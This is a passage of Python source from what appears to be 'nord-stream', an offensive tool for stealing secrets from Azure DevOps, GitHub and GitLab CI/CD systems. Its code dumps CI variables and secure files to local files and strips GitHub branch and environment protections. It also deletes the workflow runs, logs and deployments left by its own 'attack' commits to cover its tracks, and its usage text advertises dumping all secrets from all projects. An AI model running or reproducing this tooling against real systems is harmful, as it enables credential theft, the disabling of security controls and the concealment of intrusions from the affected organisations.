[buildTimeline["records"][-1]["log"]["id"]] break if i == (self._maxRetry - 1): logger.error("Output still no ready, error !") return None logId = logs[0] logger.debug(f"Log ID of the extraction task: {logId}") for i in range(self._maxRetry): if i != 0: logger.warning(f"Output not ready, sleeping for {self._sleepTime}s") time.sleep(self._sleepTime) logOutput = self._session.get( f"{self._baseURL}/{projectId}/_apis/build/builds/{runId}/logs/{logId}", json={}, ).json() if len(logOutput.get("value")) != 0: break if i == (self._maxRetry - 1): 
logger.error("Output still no ready, error !") return None date = time.strftime("%Y-%m-%d_%H-%M-%S") with open(f"{self._outputDir}/{self._org}/{projectId}/pipeline_{date}.log", "w") as f: for line in logOutput.get("value"): f.write(line + "\n") f.close() return f"pipeline_{date}.log" def __cleanRunLogs(self, projectId): logger.verbose("Cleaning run logs.") builds = self.__getBuilds(projectId) if len(builds) != 0: for build in builds: buildId = build.get("id") buildSource = self.__getBuildSources(projectId, buildId) if ( buildSource.get("comment") == (Git.ATTACK_COMMIT_MSG or Git.CLEAN_COMMIT_MSG) and buildSource.get("author").get("email") == Git.EMAIL ): return buildId self._session.delete( f"{self._baseURL}/{projectId}/_apis/build/builds/{buildId}", ) def __cleanPipeline(self, projectId): logger.verbose(f"Removing pipeline.") response = self._session.get( f"{self._baseURL}/{projectId}/_apis/pipelines", ).json() if response.get("count", 0) != 0: for pipeline in response.get("value"): if pipeline.get("name") == self._pipelineName: pipelineId = pipeline.get("id") self._session.delete( f"{self._baseURL}/{projectId}/_apis/pipelines/{pipelineId}", ) def deletePipeline(self, projectId): logger.debug("Deleting pipeline") response = self._session.get( f"{self._baseURL}/{projectId}/_apis/build/Definitions", json={}, ).json() if response.get("count", 0) != 0: for pipeline in response.get("value"): if pipeline.get("name") == self._pipelineName: definitionId = pipeline.get("id") self._session.delete( f"{self._baseURL}/{projectId}/_apis/build/definitions/{definitionId}", json={}, ) def cleanAllLogs(self, projectId): self.__cleanRunLogs(projectId) def listServiceConnections(self, projectId): logger.debug("Listing service connections") res = [] response = self._session.get( f"{self._baseURL}/{projectId}/_apis/serviceendpoint/endpoints", json={}, ) if response.status_code != 200: raise DevOpsError("Can't list service connections.") response = response.json() if response.get("count", 0) != 0: res = response.get("value") return res def getFailureReason(self, projectId, runId): res = [] response = self._session.get( f"{self._baseURL}/{projectId}/_apis/build/builds/{runId}", ).json() for result in response.get("validationResults"): res.append(result.get("message")) try: timeline = self._session.get( f"{self._baseURL}/{projectId}/_apis/build/builds/{runId}/Timeline", ).json() for record in timeline.get("records", []): if record.get("issues"): for issue in record.get("issues"): res.append(issue.get("message")) except: pass return res @classmethod def getOrgs(cls, token): logger.verbose(f"Listing orgs") if isAZDOBearerToken(token): # https://github.com/zolderio/devops/blob/main/get_profile_org_repos.py url = "https://app.vssps.visualstudio.com/_apis/profile/profiles/me?api-version=7.1" # Headers with authentication and content type headers = { 'Authorization': f'Bearer {token}', 'Content-Type': 'application/json' } response = requests.get(url, headers=headers) # Check if request was successful response.raise_for_status() # Parse and print the JSON response data = response.json() # Get organizations URL from profile response orgs_url = "https://app.vssps.visualstudio.com/_apis/accounts?memberId={}?api-version=7.1".format(data['id']) # Get organizations orgs_response = requests.get(orgs_url, headers=headers) orgs_response.raise_for_status() return orgs_response.json() else: raise DevOpsError("Only access token can be used for this operation.") ================================================ FILE: 
nordstream/cicd/github.py ================================================ import requests import time from os import makedirs import urllib.parse from nordstream.utils.errors import GitHubError, GitHubBadCredentials from nordstream.utils.log import logger from nordstream.git import Git from nordstream.utils.constants import * class GitHub: _DEFAULT_BRANCH_NAME = DEFAULT_BRANCH_NAME _token = None _auth = None _org = None _githubLogin = None _repos = [] _header = { "Accept": "application/vnd.github+json", "User-Agent": USER_AGENT, } _repoURL = "https://api.github.com/repos" _session = None _branchName = _DEFAULT_BRANCH_NAME _outputDir = OUTPUT_DIR _sleepTime = 15 _maxRetry = 10 _isGHSToken = False def __init__(self, token): self._token = token self._auth = ("foo", self._token) self._session = requests.Session() if token.lower().startswith("ghs_"): self._isGHSToken = True self._githubLogin = self.__getLogin() @staticmethod def checkToken(token): logger.verbose(f"Checking token: {token}") headers = GitHub._header headers["Authorization"] = f"token {token}" data = {"query": "query UserCurrent{viewer{login}}"} return requests.post("https://api.github.com/graphql", headers=headers, json=data).status_code == 200 @property def token(self): return self._token @property def org(self): return self._org @org.setter def org(self, org): self._org = org @property def defaultBranchName(self): return self._DEFAULT_BRANCH_NAME @property def branchName(self): return self._branchName @branchName.setter def branchName(self, value): self._branchName = value @property def repos(self): return self._repos @property def outputDir(self): return self._outputDir @outputDir.setter def outputDir(self, value): self._outputDir = value def __getLogin(self): return self.getLoginWithGraphQL().json().get("data").get("viewer").get("login") def getUser(self): logger.debug("Retrieving user informations") return self._session.get(f"https://api.github.com/user", auth=self._auth, headers=self._header) def getLoginWithGraphQL(self): logger.debug("Retrieving identity with GraphQL") headers = self._header headers["Authorization"] = f"token {self._token}" data = {"query": "query UserCurrent{viewer{login}}"} return self._session.post("https://api.github.com/graphql", headers=headers, json=data) def __paginatedGet(self, url, data="", maxData=0): page = 1 res = [] while True: params = {"page": page} response = self._session.get( url, params=params, auth=self._auth, headers=self._header, ).json() if not isinstance(response, list) and response.get("message", None): if response.get("message") == "Bad credentials": raise GitHubBadCredentials(response.get("message")) elif response.get("message") != "Not Found": raise GitHubError(response.get("message")) return res if (data != "" and len(response.get(data)) == 0) or (data == "" and len(response) == 0): break if data != "" and len(response.get(data)) != 0: res.extend(response.get(data, [])) if data == "" and len(response) != 0: res.extend(response) if maxData != 0 and len(res) >= maxData: break page += 1 return res def listRepos(self): logger.debug("Listing repos") if self._isGHSToken: url = f"https://api.github.com/orgs/{self._org}/repos" else: url = f"https://api.github.com/user/repos" response = self.__paginatedGet(url) for repo in response: # filter for specific org if self._org: if self._org.lower() == repo.get("owner").get("login").lower(): self._repos.append(repo.get("full_name")) else: self._repos.append(repo.get("full_name")) def addRepo(self, repo): logger.debug(f"Checking repo: 
{repo}") if self._org: full_name = self._org + "/" + repo else: # if no org, must provide repo as 'org/repo' # FIXME: This cannot happen at the moment because --org argument is required if len(repo.split("/")) == 2: full_name = repo else: # FIXME: Raise an Exception here logger.error("Invalid repo name: {repo}") response = self._session.get( f"{self._repoURL}/{full_name}", auth=self._auth, headers=self._header, ).json() if response.get("message", None) and response.get("message") == "Bad credentials": raise GitHubBadCredentials(response.get("message")) if response.get("id"): self._repos.append(response.get("full_name")) def listEnvFromrepo(self, repo): logger.debug(f"Listing environment secret from repo: {repo}") res = [] response = self.__paginatedGet(f"{self._repoURL}/{repo}/environments", data="environments") for env in response: res.append(env.get("name")) return res def listSecretsFromEnv(self, repo, env): logger.debug(f"Getting environment secrets for {repo}: {env}") envReq = urllib.parse.quote(env, safe="") res = [] response = self.__paginatedGet(f"{self._repoURL}/{repo}/environments/{envReq}/secrets", data="secrets") for sec in response: res.append(sec.get("name")) return res def listSecretsFromRepo(self, repo): res = [] response = self.__paginatedGet(f"{self._repoURL}/{repo}/actions/secrets", data="secrets") for sec in response: res.append(sec.get("name")) return res def listOrganizationSecretsFromRepo(self, repo): res = [] response = self.__paginatedGet(f"{self._repoURL}/{repo}/actions/organization-secrets", data="secrets") for sec in response: res.append(sec.get("name")) return res def listDependabotSecretsFromRepo(self, repo): res = [] response = self.__paginatedGet(f"{self._repoURL}/{repo}/dependabot/secrets", data="secrets") for sec in response: res.append(sec.get("name")) return res def listDependabotOrganizationSecrets(self): res = [] response = self.__paginatedGet(f"https://api.github.com/orgs/{self._org}/dependabot/secrets", data="secrets") for sec in response: res.append(sec.get("name")) return res def listEnvProtections(self, repo, env): logger.debug("Getting environment protections") envReq = urllib.parse.quote(env, safe="") res = [] response = self._session.get( f"{self._repoURL}/{repo}/environments/{envReq}", auth=self._auth, headers=self._header, ).json() for protection in response.get("protection_rules"): protectionType = protection.get("type") res.append(protectionType) return res def getEnvDetails(self, repo, env): envReq = urllib.parse.quote(env, safe="") response = self._session.get( f"{self._repoURL}/{repo}/environments/{envReq}", auth=self._auth, headers=self._header, ).json() if response.get("message"): raise GitHubError(response.get("message")) return response def createDeploymentBranchPolicy(self, repo, env): envReq = urllib.parse.quote(env, safe="") logger.debug(f"Adding new branch policy for {self._branchName} on {envReq}") data = {"name": f"{self._branchName}"} response = self._session.post( f"{self._repoURL}/{repo}/environments/{envReq}/deployment-branch-policies", json=data, auth=self._auth, headers=self._header, ).json() if response.get("message"): raise GitHubError(response.get("message")) policyId = response.get("id") logger.debug(f"Branch policy id: {policyId}") return policyId def deleteDeploymentBranchPolicy(self, repo, env): logger.debug("Delete deployment branch policy") envReq = urllib.parse.quote(env, safe="") response = self._session.get( f"{self._repoURL}/{repo}/environments/{envReq}", auth=self._auth, headers=self._header, ).json() if 
response.get("deployment_branch_policy") is not None: response = self._session.get( f"{self._repoURL}/{repo}/environments/{envReq}/deployment-branch-policies", auth=self._auth, headers=self._header, ).json() for policy in response.get("branch_policies"): if policy.get("name").lower() == self._branchName.lower(): logger.verbose(f"Deleting branch policy for {self._branchName} on {envReq}") policyId = policy.get("id") self._session.delete( f"{self._repoURL}/{repo}/environments/{envReq}/deployment-branch-policies/{policyId}", auth=self._auth, headers=self._header, ) def disableBranchProtectionRules(self, repo): logger.debug("Modifying branch protection") response = self._session.get( f"{self._repoURL}/{repo}/branches/{urllib.parse.quote(self._branchName)}", auth=self._auth, headers=self._header, ).json() if response.get("name") and response.get("protected"): data = { "required_status_checks": None, "enforce_admins": False, "required_pull_request_reviews": None, "restrictions": None, "allow_deletions": True, "allow_force_pushes": True, } self._session.put( f"{self._repoURL}/{repo}/branches/{urllib.parse.quote(self._branchName)}/protection", json=data, auth=self._auth, headers=self._header, ) def modifyEnvProtectionRules(self, repo, env, wait, reviewers, branchPolicy): data = { "wait_timer": wait, "reviewers": reviewers, "deployment_branch_policy": branchPolicy, } envReq = urllib.parse.quote(env, safe="") response = self._session.put( f"{self._repoURL}/{repo}/environments/{envReq}", json=data, auth=self._auth, headers=self._header, ).json() if response.get("message"): raise GitHubError(response.get("message")) return response def deleteDeploymentBranchPolicyForAllEnv(self, repo): allEnv = self.listEnvFromrepo(repo) for env in allEnv: self.deleteDeploymentBranchPolicy(repo, env) def checkBranchProtectionRules(self, repo): response = self._session.get( f"{self._repoURL}/{repo}/branches/{urllib.parse.quote(self._branchName)}", auth=self._auth, headers=self._header, ).json() if response.get("message"): raise GitHubError(response.get("message")) return response.get("protected") def getBranchesProtectionRules(self, repo): logger.debug("Getting branch protection rules") response = self._session.get( f"{self._repoURL}/{repo}/branches/{urllib.parse.quote(self._branchName)}/protection", auth=self._auth, headers=self._header, ).json() if response.get("message"): return None return response def updateBranchesProtectionRules(self, repo, protections): logger.debug("Updating branch protection rules") response = self._session.put( f"{self._repoURL}/{repo}/branches/{urllib.parse.quote(self._branchName)}/protection", auth=self._auth, headers=self._header, json=protections, ).json() return response def cleanDeploymentsLogs(self, repo): logger.verbose(f"Cleaning deployment logs from: {repo}") url = f"{self._repoURL}/{repo}/deployments?ref={urllib.parse.quote(self._branchName)}" response = self.__paginatedGet(url, maxData=200) for deployment in response: if not self._isGHSToken and deployment.get("creator").get("login").lower() != self._githubLogin.lower(): continue commit = self._session.get( f"{self._repoURL}/{repo}/commits/{deployment['sha']}", auth=self._auth, headers=self._header ).json() # We want to delete only our action so we must filter some attributes if commit["commit"]["message"] not in [Git.ATTACK_COMMIT_MSG, Git.CLEAN_COMMIT_MSG]: continue if commit["commit"]["committer"]["name"] != Git.USER: continue if commit["commit"]["committer"]["email"] != Git.EMAIL: continue deploymentId = deployment.get("id") 
data = {"state": "inactive"} self._session.post( f"{self._repoURL}/{repo}/deployments/{deploymentId}/statuses", json=data, auth=self._auth, headers=self._header, ) self._session.delete( f"{self._repoURL}/{repo}/deployments/{deploymentId}", auth=self._auth, headers=self._header, ) def cleanRunLogs(self, repo, workflowFilename): logger.verbose(f"Cleaning run logs from: {repo}") url = f"{self._repoURL}/{repo}/actions/runs?branch={urllib.parse.quote(self._branchName)}" if not self._isGHSToken: url += f"&actor={self._githubLogin.lower()}" # we dont scan for all the logs we only check the last 200 response = self.__paginatedGet(url, data="workflow_runs", maxData=200) for run in response: # skip if it's not our commit if run.get("head_commit").get("message") not in [Git.ATTACK_COMMIT_MSG, Git.CLEAN_COMMIT_MSG]: continue committer = run.get("head_commit").get("committer") if committer.get("name") != Git.USER: continue if committer.get("email") != Git.EMAIL: continue runId = run.get("id") status = ( self._session.get( f"{self._repoURL}/{repo}/actions/runs/{runId}", json={}, auth=self._auth, headers=self._header, ) .json() .get("status") ) if status != "completed": self._session.post( f"{self._repoURL}/{repo}/actions/runs/{runId}/cancel", json={}, auth=self._auth, headers=self._header, ) status = ( self._session.get( f"{self._repoURL}/{repo}/actions/runs/{runId}", json={}, auth=self._auth, headers=self._header, ) .json() .get("status") ) if status != "completed": for i in range(self._maxRetry): time.sleep(2) status = ( self._session.get( f"{self._repoURL}/{repo}/actions/runs/{runId}", json={}, auth=self._auth, headers=self._header, ) .json() .get("status") ) if status == "completed": break self._session.delete( f"{self._repoURL}/{repo}/actions/runs/{runId}/logs", auth=self._auth, headers=self._header, ) self._session.delete( f"{self._repoURL}/{repo}/actions/runs/{runId}", auth=self._auth, headers=self._header, ) def cleanAllLogs(self, repo, workflowFilename): logger.debug(f"Cleaning logs for: {repo}") self.cleanRunLogs(repo, workflowFilename) self.cleanDeploymentsLogs(repo) def createWorkflowOutputDir(self, repo): outputName = repo.split("/") makedirs(f"{self._outputDir}/{outputName[0]}/{outputName[1]}", exist_ok=True) def waitWorkflow(self, repo, workflowFilename): logger.info("Getting workflow output") time.sleep(5) workflowFilename = urllib.parse.quote_plus(workflowFilename) response = self._session.get( f"{self._repoURL}/{repo}/actions/workflows/{workflowFilename}/runs?branch={urllib.parse.quote(self._branchName)}", auth=self._auth, headers=self._header, ).json() if response.get("total_count", 0) == 0: for i in range(self._maxRetry): logger.warning(f"Workflow not started, sleeping for {self._sleepTime}s") time.sleep(self._sleepTime) response = self._session.get( f"{self._repoURL}/{repo}/actions/workflows/{workflowFilename}/runs?branch={urllib.parse.quote(self._branchName)}", auth=self._auth, headers=self._header, ).json() if response.get("total_count", 0) != 0: break if i == (self._maxRetry - 1): logger.error("Error: workflow still not started.") return None, None if response.get("workflow_runs")[0].get("status") != "completed": for i in range(self._maxRetry): logger.warning(f"Workflow not finished, sleeping for {self._sleepTime}s") time.sleep(self._sleepTime) response = self._session.get( f"{self._repoURL}/{repo}/actions/workflows/{workflowFilename}/runs?branch={urllib.parse.quote(self._branchName)}", auth=self._auth, headers=self._header, ).json() if 
response.get("workflow_runs")[0].get("status") == "completed": break if i == (self._maxRetry - 1): logger.error("Error: workflow still not finished.") return ( response.get("workflow_runs")[0].get("id"), response.get("workflow_runs")[0].get("conclusion"), ) def downloadWorkflowOutput(self, repo, name, workflowId): self.createWorkflowOutputDir(repo) zipFile = self._session.get( f"{self._repoURL}/{repo}/actions/runs/{workflowId}/logs", auth=self._auth, headers=self._header, ) date = time.strftime("%Y-%m-%d_%H-%M-%S") with open(f"{self._outputDir}/{repo}/workflow_{name}_{date}.zip", "wb") as f: f.write(zipFile.content) f.close() return f"workflow_{name}_{date}.zip" def getFailureReason(self, repo, workflowId): res = [] workflow = self._session.get( f"{self._repoURL}/{repo}/actions/runs/{workflowId}", auth=self._auth, headers=self._header, ).json() checkSuiteId = workflow.get("check_suite_id") checkRuns = self._session.get( f"{self._repoURL}/{repo}/check-suites/{checkSuiteId}/check-runs", auth=self._auth, headers=self._header, ).json() if checkRuns.get("total_count"): for checkRun in checkRuns.get("check_runs"): checkRunId = checkRun.get("id") annotations = self._session.get( f"{self._repoURL}/{repo}/check-runs/{checkRunId}/annotations", auth=self._auth, headers=self._header, ).json() for annotation in annotations: res.append(annotation.get("message")) return res def filterWriteRepos(self): res = [] for repo in self._repos: try: self.listSecretsFromRepo(repo) res.append(repo) except GitHubError: pass self._repos = res def isGHSToken(self): return self._isGHSToken ================================================ FILE: nordstream/cicd/gitlab.py ================================================ import requests import time import re import sys from os import makedirs from nordstream.utils.log import logger from nordstream.utils.errors import GitLabError from nordstream.git import Git from nordstream.utils.constants import * from nordstream.utils.helpers import isGitLabSessionCookie # painful warnings you know what you are doing right ? 
requests.packages.urllib3.disable_warnings() class GitLab: _DEFAULT_BRANCH_NAME = DEFAULT_BRANCH_NAME _auth = None _session = None _token = None _projects = [] _groups = [] _outputDir = OUTPUT_DIR _headers = { "User-Agent": USER_AGENT, } _cookies = {} _gitlabURL = None _branchName = _DEFAULT_BRANCH_NAME _sleepTime = 15 _maxRetry = 10 def __init__(self, url, token, verifCert): self._gitlabURL = url.strip("/") self._token = token self._session = requests.Session() self._session.verify = verifCert self.setCookiesAndHeaders() self._gitlabLogin = self.__getLogin() @property def projects(self): return self._projects @property def groups(self): return self._groups @property def token(self): return self._token @property def url(self): return self._gitlabURL @property def outputDir(self): return self._outputDir @outputDir.setter def outputDir(self, value): self._outputDir = value @property def defaultBranchName(self): return self._DEFAULT_BRANCH_NAME @property def branchName(self): return self._branchName @branchName.setter def branchName(self, value): self._branchName = value @classmethod def checkToken(cls, token, gitlabURL, verifyCert): logger.verbose(f"Checking token: {token}") # from https://docs.gitlab.com/ee/api/rest/index.html#personalprojectgroup-access-tokens try: cookies = {} headers = GitLab._headers if isGitLabSessionCookie(token): cookies["_gitlab_session"] = token else: headers["PRIVATE-TOKEN"] = token return ( requests.get( f"{gitlabURL.strip('/')}/api/v4/user", headers=headers, cookies=cookies, verify=verifyCert, ).status_code == 200 ) except requests.exceptions.RequestException as e: logger.error(e) sys.exit(1) return False def __getLogin(self): response = self.getUser() return response.get("username", "") def getUser(self): logger.debug(f"Retrieving user information") return self._session.get(f"{self._gitlabURL}/api/v4/user").json() def setCookiesAndHeaders(self): if isGitLabSessionCookie(self._token): self._session.cookies.update({"_gitlab_session": self._token}) else: self._session.headers.update({"PRIVATE-TOKEN": self._token}) self._session.headers.update(self._headers) def __paginatedGet(self, url, params={}): params["per_page"] = 100 res = [] i = 1 while True: params["page"] = i logger.debug(f"Paginated GET request to {url} with parameters {params}") response = self._session.get(url, params=params) if response.status_code == 200: if len(response.json()) == 0: break res.extend(response.json()) i += 1 else: logger.debug(f"Error {response.status_code} while retrieving data: {url}") return response.status_code, response.json() return response.status_code, res def listRunnersFromProject(self, project): id = project.get("id") res = [] status_code, response = self.__paginatedGet(f"{self._gitlabURL}/api/v4/projects/{id}/jobs") if status_code == 200 and len(response) > 0: for job in response: if not job.get("runner") or not job.get("runner_manager"): continue # Get executor from job trace executor = "unknown" response = self._session.get(f"{self._gitlabURL}/api/v4/projects/{id}/jobs/{job['id']}/trace") if response.status_code == 200 and len(response.text) > 0: regex = r'Preparing the "([^"]+)" executor' match = re.search(r'Preparing the "([^"]+)" executor', response.text) if match: executor = match.group(1) _runner = job["runner"] _manager = job["runner_manager"] res.append( { "id": f"{_runner['id']}/{_manager['system_id']}", "status": _manager["status"], "contacted_at": _manager["contacted_at"], "runner_type": _runner["runner_type"], "access_level": "unknown", "executor": executor, 
"description": _runner["description"], "platform": _manager["platform"], "architecture": _manager["architecture"], "ip_address": _manager["ip_address"], "version": _manager["version"], "projects": [project["path_with_namespace"]], "tags": job["tag_list"], } ) elif status_code == 403: raise GitLabError(response.get("message")) return res def listVariablesFromProject(self, project): id = project.get("id") res = [] status_code, response = self.__paginatedGet(f"{self._gitlabURL}/api/v4/projects/{id}/variables") if status_code == 200 and len(response) > 0: path = self.__createOutputDir(project.get("path_with_namespace")) f = open(f"{path}/secrets.txt", "w") for variable in response: secret = {"key": variable["key"], "value": variable["value"], "protected": variable["protected"]} if variable.get("hidden") is not None: secret["hidden"] = variable["hidden"] else: secret["hidden"] = "N/A" res.append(secret) f.write(f"{variable['key']}={variable['value']}\n") f.close() elif status_code == 403: raise GitLabError(response.get("message")) return res def listInheritedVariablesFromProject(self, project): id = project.get("id") res = [] graphQL = { "operationName": "getInheritedCiVariables", "variables": {"first": 100, "fullPath": project.get("path_with_namespace")}, "query": """ query getInheritedCiVariables($after: String, $first: Int, $fullPath: ID!) { project(fullPath: $fullPath) { inheritedCiVariables(after: $after, first: $first) { nodes { key groupName masked hidden protected raw } } } } """, } response = self._session.post(f"{self._gitlabURL}/api/graphql", json=graphQL) if response.status_code == 200 and len(response.text) > 0: if response.json().get("data", {}).get("project", {}) is None: return res path = self.__createOutputDir(project.get("path_with_namespace")) f = open(f"{path}/secrets.txt", "a") nodes = response.json().get("data", {}).get("project", {}).get("inheritedCiVariables", {}).get("nodes", []) for variable in nodes: secret = { "key": variable["key"], "value": variable["raw"], "group": variable["groupName"], "protected": variable["protected"], } if variable.get("hidden") is not None: secret["hidden"] = variable["hidden"] else: secret["hidden"] = "N/A" res.append(secret) f.write(f"{variable['key']}={variable['raw']}\n") f.close() elif response.status_code == 403: raise GitLabError(response.get("message")) return res def listSecureFilesFromProject(self, project): logger.debug("Getting project secure files") id = project.get("id") res = [] status_code, response = self.__paginatedGet(f"{self._gitlabURL}/api/v4/projects/{id}/secure_files") if status_code == 200 and len(response) > 0: path = self.__createOutputDir(project.get("path_with_namespace")) date = time.strftime("%Y-%m-%d_%H-%M-%S") for secFile in response: date = time.strftime("%Y-%m-%d_%H-%M-%S") name = "".join( [c for c in secFile.get("name") if c.isalpha() or c.isdigit() or c in (" ", ".", "-", "_")] ).strip() fileName = f"securefile_{date}_{name}" f = open(f"{path}/{fileName}", "wb") content = self._session.get( f"{self._gitlabURL}/api/v4/projects/{id}/secure_files/{secFile.get('id')}/download" ) # handle large files for chunk in content.iter_content(chunk_size=8192): f.write(chunk) f.close() res.append({"name": secFile.get("name"), "path": f"{path}/{fileName}"}) elif status_code == 403: raise GitLabError(response.get("message")) return res def listVariablesFromGroup(self, group): id = group.get("id") res = [] status_code, response = self.__paginatedGet(f"{self._gitlabURL}/api/v4/groups/{id}/variables") if status_code == 200 
and len(response) > 0: path = self.__createOutputDir(group.get("full_path")) f = open(f"{path}/secrets.txt", "w") for variable in response: secret = {"key": variable["key"], "value": variable["value"], "protected": variable["protected"]} if variable.get("hidden") is not None: secret["hidden"] = variable["hidden"] else: secret["hidden"] = "N/A" res.append(secret) f.write(f"{variable['key']}={variable['value']}\n") f.close() elif status_code == 403: raise GitLabError(response.get("message")) return res def listVariablesFromInstance(self): res = [] status_code, response = self.__paginatedGet(f"{self._gitlabURL}/api/v4/admin/ci/variables") if status_code == 200 and len(response) > 0: path = self.__createOutputDir("") f = open(f"{path}/secrets.txt", "w") for variable in response: secret = {"key": variable["key"], "value": variable["value"], "protected": variable["protected"]} if variable.get("hidden") is not None: secret["hidden"] = variable["hidden"] else: secret["hidden"] = "N/A" res.append(secret) f.write(f"{variable['key']}={variable['value']}\n") f.close() elif status_code == 403: raise GitLabError(response.get("message")) return res def addProjects(self, project=None, filterWrite=False, strict=False, membership=False): params = {} if membership: params["membership"] = True if project != None: params["search_namespaces"] = True params["search"] = project if filterWrite: params["min_access_level"] = 30 if not (project and project.isnumeric()): status_code, response = self.__paginatedGet(f"{self._gitlabURL}/api/v4/projects", params) else: response = self._session.get(f"{self._gitlabURL}/api/v4/projects/{project}") status_code = response.status_code response = [response.json()] if status_code == 200: if len(response) == 0: return for p in response: if strict and p.get("path_with_namespace") != project: continue p = { "id": p.get("id"), "path_with_namespace": p.get("path_with_namespace"), "name": p.get("name"), "path": p.get("path"), } self._projects.append(p) else: logger.error(f"Error while retrieving {f'project: {project}' if project is not None else 'projects'}") logger.debug(response) def addGroups(self, group=None): params = {"all_available": True} if group != None: params["search_namespaces"] = True params["search"] = group status_code, response = self.__paginatedGet(f"{self._gitlabURL}/api/v4/groups", params) if status_code == 200: if len(response) == 0: return for p in response: p = { "id": p.get("id"), "full_path": p.get("full_path"), "name": p.get("name"), } self._groups.append(p) else: logger.error("Error while retrieving groups") logger.debug(response) def listUsers(self): logger.debug(f"Listing users.") res = [] status_code, response = self.__paginatedGet(f"{self._gitlabURL}/api/v4/users") if status_code == 200: if len(response) == 0: return for p in response: u = { "id": p.get("id"), "username": p.get("username"), "email": p.get("email"), "is_admin": p.get("is_admin"), } res.append(u) else: logger.error("Error while retrieving users") logger.debug(response) return res def __createOutputDir(self, name): # outputName = name.replace("/", "_") path = f"{self._outputDir}/{name}" makedirs(path, exist_ok=True) return path def waitPipeline(self, projectId): logger.info("Getting pipeline output") time.sleep(5) response = self._session.get( f"{self._gitlabURL}/api/v4/projects/{projectId}/pipelines?ref={self._branchName}&username={self._gitlabLogin}" ).json() if response[0].get("status") not in COMPLETED_STATES: for i in range(self._maxRetry): logger.warning(f"Pipeline still running, 
sleeping for {self._sleepTime}s") time.sleep(self._sleepTime) response = self._session.get( f"{self._gitlabURL}/api/v4/projects/{projectId}/pipelines?ref={self._branchName}&username={self._gitlabLogin}" ).json() if response[0].get("status") in COMPLETED_STATES: break if i == (self._maxRetry - 1): logger.error("Error: pipeline still not finished.") return ( response[0].get("id"), response[0].get("status"), ) def __getJobs(self, projectId, pipelineId): status_code, response = self.__paginatedGet( f"{self._gitlabURL}/api/v4/projects/{projectId}/pipelines/{pipelineId}/jobs" ) if status_code == 403: raise GitLabError(response.get("message")) # reverse the list to get the first job at the first position return response[::-1] def downloadPipelineOutput(self, project, pipelineId): projectPath = project.get("path_with_namespace") self.__createOutputDir(projectPath) projectId = project.get("id") jobs = self.__getJobs(projectId, pipelineId) date = time.strftime("%Y-%m-%d_%H-%M-%S") f = open(f"{self._outputDir}/{projectPath}/pipeline_{date}.log", "w") if len(jobs) == 0: return None for job in jobs: jobId = job.get("id") jobName = job.get("name", "") jobStage = job.get("stage", "") jobStatus = job.get("status", "") output = self.__getTraceForJobId(projectId, jobId) if jobStatus != "skipped": f.write(f"[+] {jobName} (stage={jobStage})\n") f.write(output) f.close() return f"pipeline_{date}.log" def __getTraceForJobId(self, projectId, jobId): response = self._session.get(f"{self._gitlabURL}/api/v4/projects/{projectId}/jobs/{jobId}/trace") if response.status_code != 200: for i in range(self._maxRetry): logger.warning(f"Output not ready, sleeping for {self._sleepTime}s") time.sleep(self._sleepTime) response = self._session.get(f"{self._gitlabURL}/api/v4/projects/{projectId}/jobs/{jobId}/trace") if response.status_code == 200: break if i == (self._maxRetry - 1): logger.error("Output still no ready, error !") return None return response.text def __deletePipeline(self, projectId): logger.debug("Deleting pipeline") status_code, response = self.__paginatedGet( f"{self._gitlabURL}/api/v4/projects/{projectId}/pipelines?ref={self._branchName}&username={self._gitlabLogin}" ) headers = {} # Get CSRF token when using session cookie otherwise we can't delete a pipeline if isGitLabSessionCookie(self._token): html_content = self._session.get(f"{self._gitlabURL}/").text pattern = r' --org [extraction] [--project --write-filter --no-clean --branch-name --pipeline-name --pipeline-file --repo-name --pool-name --os --default-agent --sleep ] nord-stream devops [options] --token --org --yaml --project [--write-filter --no-clean --branch-name --pipeline-name --pipeline-file --repo-name --sleep ] nord-stream devops [options] --token --org --build-yaml [--build-type ] [--pool-name ] [--os linux|windows] nord-stream devops [options] --token --org --clean-logs [--project ] nord-stream devops [options] --token --org --list-projects [--write-filter] nord-stream devops [options] --token --org --list-repositories [--project ] nord-stream devops [options] --token --org (--list-secrets [--project --write-filter] | --list-users) nord-stream devops [options] --token --org --describe-token nord-stream devops [options] --token --list-orgs Options: -h --help Show this screen. --version Show version. 
-v, --verbose Verbose mode -d, --debug Debug mode --output-dir Output directory for logs --ignore-cert Allow insecure server connections Commit: --user User used to commit --email Email address used commit --key-id GPG primary key ID to sign commits args: --token Azure DevOps personal token or JWT --org Org name -p, --project Run on selected project (can be a file) -y, --yaml Run arbitrary job --clean-logs Delete all pipeline created by this tool. This operation is done by default but can be manually triggered. --no-clean Don't clean pipeline logs (default false) --list-projects List all projects. --list-repositories List all repositories. --list-secrets List all secrets. --list-users List all users. --write-filter Filter projects where current user has write or admin access. --build-yaml Create a pipeline yaml file with default configuration. --build-type Type used to generate the yaml file can be: default, azurerm, github, aws, sonar, ssh --describe-token Display information on the token --branch-name Use specific branch name for deployment. --pipeline-name Use pipeline for deployment. --pipeline-file Pipeline filename (default: azure-pipelines.yml). --repo-name Use specific repo for deployment. --pool-name Use specific pool name for deployment. This value will be set as pool name in the YAML file --default-agent Use specific default agent pool for deployment. This value will be used as Default agent pool for the pipeline --os [linux | windows] The agent's OS where the pipeline will be run. Default to linux --sleep Sleep this amount of time before retrieving pipeline result (15s by default) Exctraction: --extract Extract following secrets [vg,sf,gh,az,aws,sonar,ssh] --no-extract Don't extract following secrets [vg,sf,gh,az,aws,sonar,ssh] Examples: List all secrets from all projects $ nord-stream devops --token "$PAT" --org myorg --list-secrets Dump all secrets from all projects $ nord-stream devops --token "$PAT" --org myorg Authors: @hugow @0hexit """ from docopt import docopt from nordstream.cicd.devops import DevOps from nordstream.core.devops.devops import DevOpsRunner from nordstream.git import Git from nordstream.utils.log import NordStreamLog, logger from nordstream.utils.devops import listOrgs def start(argv): args = docopt(__doc__, argv=argv) if args["--verbose"]: NordStreamLog.setVerbosity(verbose=1) if args["--debug"]: NordStreamLog.setVerbosity(verbose=2) logger.debug(args) if args["--list-orgs"]: listOrgs(args["--token"]) return # check validity of the token if not DevOps.checkToken(args["--token"], args["--org"], (not args["--ignore-cert"])): logger.critical("Invalid token or org.") # devops setup devops = DevOps(args["--token"], args["--org"], (not args["--ignore-cert"])) if args["--output-dir"]: devops.outputDir = args["--output-dir"] + "/" if args["--branch-name"]: devops.branchName = args["--branch-name"] if args["--pipeline-name"]: devops.pipelineName = args["--pipeline-name"] if args["--repo-name"]: devops.repoName = args["--repo-name"] if args["--default-agent"]: devops.defaultAgentPool = args["--default-agent"] if args["--sleep"]: devops.sleepTime = args["--sleep"] devopsRunner = 